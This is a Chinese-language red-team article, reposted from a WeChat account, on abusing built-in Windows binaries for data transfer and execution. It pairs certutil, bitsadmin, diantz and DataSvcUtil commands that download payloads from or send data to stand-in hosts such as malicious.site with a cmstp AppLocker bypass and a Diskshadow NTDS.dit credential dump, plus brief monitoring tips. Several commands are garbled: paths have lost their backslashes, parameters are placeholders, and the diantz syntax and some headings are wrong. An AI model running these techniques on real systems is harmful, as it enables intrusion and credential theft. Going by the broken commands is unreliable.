命令执行程序
攻击者采用的技术之一是利用备用数据流 (ADS) 来隐藏恶意负载。此外,cmd.exe还可用于下载或上传文件,从而促进数据进出。
#Creating an Alternate Data Stream:
echo This is hidden data > legitfile.txt:hidden.txt
#Executing a PowerShell command using cmd.exe:
cmd.exe /c "powershell -Command "& {Write-Output 'Hello from PowerShell'}""
提示和技巧:始终监视cmd.exe不寻常或意外的命令行参数。考虑使用 Sysmon 记录命令行执行。
powershell.exe(编码和执行)
恶意行为者经常使用PowerShell 的 -EncodedCommand参数来执行 Base64 编码的命令,这使得检测和分析更具挑战性。
#Executing an Encoded PowerShell Command:
$command = "Write-Output 'Malicious Activity'"
$encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
powershell.exe -EncodedCommand $encodedCommand
提示和技巧:启用 PowerShell 日志记录以捕获和分析所有已执行的脚本。考虑使用 Revoke-Obfuscation 等工具来检测混淆的 PowerShell 脚本。
certutil.exe(数据传输和编码)
Certutil.exe 是一个用于管理 Windows 中证书的命令行程序。然而,它能够下载文件和编码/解码数据,这使它成为攻击者的常用工具。他们可以滥用 certutil.exe 从远程服务器获取恶意负载或混淆数据以逃避检测。
#Downloading a File with Certutil:
certutil.exe -urlcache -split -f "http://malicious.site/payload.exe" payload.exe
#Decoding a Base64 Encoded File:
certutil.exe -decode encodedfile.txt decodedfile.exe
提示和技巧:监控任何网络连接或异常文件操作。如果在您的环境中certutil.exe没有合法使用certutil.exe ,请考虑阻止或限制其执行。
bash.exe(间接命令执行)
通过使用特定参数或脚本调用 Bash.exe,恶意行为者可以运行如果直接执行可能会被标记或阻止的命令。
命令
bash.exe -c "your_linux_command_here"
Powershell
Start-Process -NoNewWindow "bash.exe" -ArgumentList "-c your_linux_command_here"
bitsadmin.exe(文件传输)
Bitsadmin.exe 是一个命令行工具,可以创建和监控 BITS(后台智能传输服务)作业。虽然它的合法用途是在机器之间传输文件,但攻击者可能会滥用它来下载、上传甚至执行恶意文件。它在后台执行这些任务的能力可能会使检测更具挑战性。
命令
bitsadmin.exe /transfer job_name /download /priority normal http://malicious_url/malicious_file C:pathtosavemalicious_file
Powershell
Start-Process -NoNewWindow "bitsadmin.exe" -ArgumentList "/transfer job_name /download /priority normal http://malicious_url/malicious_file C:pathtosavemalicious_file"
certos.exe(文件传输)
CertOC.exe 是与 Windows 中的证书操作相关的合法二进制文件。但是,攻击者可能会滥用其功能来下载或执行恶意文件。通过使用特定参数调用 CertOC.exe,攻击者可以将文件从远程位置传输到本地计算机,从而可能绕过某些安全控制。
命令
CertOC.exe -parameter:[specific_parameters_for_transfer]
Powershell
Start-Process -NoNewWindow "CertOC.exe" -ArgumentList "-parameter:[specific_parameters_for_transfer]"
diantz.exe(NTFS 属性操作和文件传输)
Diatz.exe 是与存档功能相关的合法 Windows 二进制文件。攻击者可利用它来操纵 NTFS 文件属性,从而隐藏恶意活动或文件。此外,它还可用于从远程服务器下载恶意负载。
命令
Diantz.exe /option:C:pathtoinput http://malicious.site/payload
Powershell
Invoke-Expression "Diantz.exe /option:C:pathtoinput http://malicious.site/payload"
cmstp.exe(应用程序白名单绕过)
Cmstp.exe 是用于安装连接管理器服务配置文件的 Microsoft 二进制文件。攻击者发现,它可以被滥用来执行恶意脚本,并通过调用恶意 .inf 文件的安装来绕过应用程序白名单解决方案(例如 AppLocker)。
命令
cmstp.exe /s /ns C:pathtomalicious.inf
Powershell
Invoke-Expression "cmstp.exe /s /ns C:pathtomalicious.inf"
control.exe(恶意活动)
Control.exe 是 Windows 控制面板的主要可执行文件。攻击者可以通过调用已被篡改或被恶意版本替换的特定控制面板项 (.cpl 文件) 来滥用它。这可能导致一系列恶意活动,从信息窃取到系统入侵。
命令
control.exe C:pathtomalicious.cpl
Powershell
Invoke-Expression "control.exe C:pathtomalicious.cpl"
cscript.exe C:pathtoscript.vbs
Powershell
Invoke-Expression "cscript.exe C:pathtoscript.vbs"
DataSvcUtil.exe(通过 Web 服务渗透)
DataSvcUtil.exe 是一种用于生成数据服务类的工具。恶意行为者可能会滥用此工具,通过将数据发送到 Web 服务来窃取数据。监控网络流量和此二进制文件的行为有助于识别可疑活动。
命令
DataSvcUtil.exe /out:C:pathtooutput /uri:http://malicious.site
Powershell
Invoke-Expression "DataSvcUtil.exe /out:C:pathtooutput /uri:http://malicious.site"
Diskshadow.exe(NTDS 转储和间接命令执行)
Diskshadow.exe是用于磁盘影子复制的 Windows 实用程序。恶意行为者可能会滥用它来转储 NTDS.dit 文件,该文件包含 Active Directory 数据(包括用户凭据)。此外,它还可用于间接执行命令,允许攻击者在另一个进程的上下文中运行命令。
命令
Diskshadow.exe -s C:pathtoscript.txt
Powershell
Invoke-Expression "Diskshadow.exe -s C:pathtoscript.txt"
原文始发于微信公众号(Ots安全):红队-数据传输技术
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论